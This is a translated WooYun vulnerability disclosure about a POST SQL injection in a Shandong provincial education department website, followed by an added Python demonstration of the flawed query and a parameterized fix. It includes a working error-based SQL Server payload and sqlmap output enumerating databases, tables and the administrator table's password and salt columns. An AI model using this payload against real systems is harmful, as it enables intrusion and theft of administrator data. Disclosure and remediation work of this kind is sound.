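Vulnerability summary

Bug ID: wooyun-2015-0156309

Title: How I found vulnerabilities in a site run by a provincial education department (POST injection + cross-database access + administrator information disclosure)

Vendor: Higher Education Division, Shandong Provincial Department of Education

Author: 路人甲

Submitted: 2015-11-27 16:34

Fixed: 2016-01-15 17:10

Published: 2016-01-15 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]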


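Vulnerability details

Disclosure status:

2015-11-27: Details reported to the vendor; awaiting vendor handling
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in related fields
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to trainee white hats
2016-01-15: Details disclosed to the public

Brief description:

As the title says...

Detailed description:

POST injection exists in the Higher Education Division of a provincial education department, leaking database and other information...

Proof of vulnerability:

Target site: **.**.**.**
POST injection:
URL:
http://**.**.**.**/plugins/Jglx/aspx/years.aspx?years=2015"
POST: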
__VIEWSTATE=[...]&__VIEWSTATEGENERATOR=7F45703A&scho=88952634
test:
sqlmap identified the following injection point(s) with a total of 280 HTTP(s) requests:
---
Parameter: scho (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=[...]&__VIEWSTATEGENERATOR=7F45703A&scho=88952634%' AND 9171=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9171=9171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113))) AND '%'='
---
[13:32:16] [INFO] testing Microsoft SQL Server
[13:32:17] [INFO] confirming Microsoft SQL Server
[13:32:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[13:32:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[13:32:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 13:32:19
available databases [13]:
[*] ASPState
[*] DatabaseNamePlaceHolder
[*] DTcmsdb2
[*] DTcmsdb3
[*] master
[*] model
[*] msdb
[*] sdgspx_db
[*] tempdb
[*] Vocation_DTcmsdb3
[*] VoteOnlineDB
[*] ZhiChengOnlineDB
[*] ZhiChengOnlineDBNew
[13:34:46] [INFO] retrieved: zhicheng
current user: 'zhicheng'
[13:34:46] [INFO] fetching current database
[13:34:46] [INFO] retrieved: DTcmsdb3
current database: 'DTcmsdb3'
Database: DTcmsdb3
[74 tables]
+----------------------------+
| Mspx |
| Mspx_Exp |
| Mspx_ExpMark |
| Mspx_File |
| Mspx_TchMark |
| Mspx_View |
| Mspx_teacher |
| Mspx_xueke |
| Shpg_batch |
| Shpg_report |
| Shpg_report_mark |
| Table_1 |
| View_1 |
| View_2 |
| View_3 |
| dt_Dspj |
| dt_JglxTeacher |
| dt_Jglx_BBS |
| dt_Jglx_ExpText |
| dt_Jglx_Experts |
| dt_Jglx_File |
| dt_Jglx_ProAbout |
| dt_Jglx_ProAchieve |
| dt_Jglx_ProMembers |
| dt_Jglx_ProOutlay |
| dt_Jglx_ProPerson |
| dt_Jglx_ProPerson_Research |
| dt_Jglx_ProPerson_Resume |
| dt_Jglx_ProText |
| dt_Jglx_Type |
| dt_article |
| dt_article_albums |
| dt_article_attach |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category |
| dt_article_comment |
| dt_channel |
| dt_channel_category |
| dt_channel_field |
| dt_express |
| dt_feedback |
| dt_link |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_value |
| dt_minbandoc |
| dt_navigation |
| dt_order_goods |
| dt_orders |
| dt_payment |
| dt_pubendoc |
| dt_qsArticle |
| dt_sms_template |
| dt_user_amount_log |
| dt_user_code |
| dt_user_group_price |
| dt_user_groups |
| dt_user_login_log |
| dt_user_message |
| dt_user_oauth |
| dt_user_oauth_app |
| dt_user_point_log |
| dt_users |
| table2 |
| table3 |
| table4 |
| ttt |
| view_channel_content |
| view_channel_down |
| view_channel_news |
| view_channel_photo |
+----------------------------+
Database: DTcmsdb3
Table: dt_manager
[12 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| add_time | datetime |
| email | nvarchar |
| id | int |
| is_lock | int |
| password | nvarchar |
| real_name | nvarchar |
| role_id | int |
| role_type | int |
| salt | nvarchar |
| telephone | nvarchar |
| user_name | nvarchar |
| user_unit | nvarchar |
+-----------+----------+
Database: DTcmsdb3
Table: dt_manager
[77 entries]
+----+-----------------+----------------------------------+
| id | user_name | password |
+----+-----------------+----------------------------------+
+----+-----------------+----------------------------------+
The vulnerability exists; I did not dig any deeper, reaching the goal is enough...

Remediation:

You know this better than I do...
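
As an added example (not code from the report or from the affected site): the `%' ... AND '%'='` wrapper around the sqlmap payload indicates that the `scho` POST value lands inside a `LIKE '%...%'` string literal. The sketch below puts that assumed query shape next to a validated, parameterized version; Python's sqlite3 stands in for ASP.NET and SQL Server, and the `project` table, its columns and all function names are hypothetical.

```python
import sqlite3

# Constructed probes: same wrapper as the reported payload, constant condition.
PROBE_TRUE = "88952634%' AND 1=1 AND '%'='"
PROBE_FALSE = "88952634%' AND 1=0 AND '%'='"

def make_db():
    # Constructed sample data; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE project (id INTEGER PRIMARY KEY, scho TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO project (scho, title) VALUES (?, ?)",
        [("88952634", "Project A"), ("88952635", "Project B"), ("12345678", "Project C")],
    )
    return db

def lookup_vulnerable(db, scho):
    # Assumed flawed pattern: the POST value is pasted between LIKE '% and %',
    # so a quote in the value ends the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM project WHERE scho LIKE '%" + scho + "%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def escape_like(value, esc="\\"):
    # Neutralise LIKE wildcards so the input can only match literally.
    for ch in (esc, "%", "_"):
        value = value.replace(ch, esc + ch)
    return value

def lookup_hardened(db, scho):
    # 1) Allow-list: the legitimate value in the report is a short decimal id.
    if not (scho.isascii() and scho.isdigit() and len(scho) <= 12):
        raise ValueError("scho must be a decimal identifier")
    # 2) Bind the value as a parameter; it is never parsed as SQL text.
    #    escape_like keeps the query safe if the allow-list is relaxed later.
    sql = "SELECT title FROM project WHERE scho LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(scho) + "%",))]

def handle_request(db, form):
    # 3) Return generic errors only: the error-based technique in the sqlmap
    #    output needs the database error text to reach the HTTP response.
    try:
        return 200, lookup_hardened(db, form.get("scho", ""))
    except ValueError:
        return 400, "invalid request"
    except sqlite3.Error:
        return 500, "internal error"

if __name__ == "__main__":
    db = make_db()
    # The vulnerable query's result follows the injected condition.
    print(lookup_vulnerable(db, PROBE_TRUE), lookup_vulnerable(db, PROBE_FALSE))
    # The hardened handler rejects the same input before it reaches the database.
    print(handle_request(db, {"scho": PROBE_FALSE}))
    print(handle_request(db, {"scho": "88952634"}))
```

On the real stack the same three controls map to a bound `SqlParameter`, server-side validation of `scho`, and custom error pages instead of raw SQL Server messages; the database list in the output also suggests the application login can reach more databases than it needs.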

Copyright notice: please credit the source when reposting: 路人甲@WooYun


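Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-01 17:08

Vendor reply:

CNVD confirmed and reproduced the reported vulnerability, and has forwarded it to CNCERT for dispatch to its Shandong branch, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None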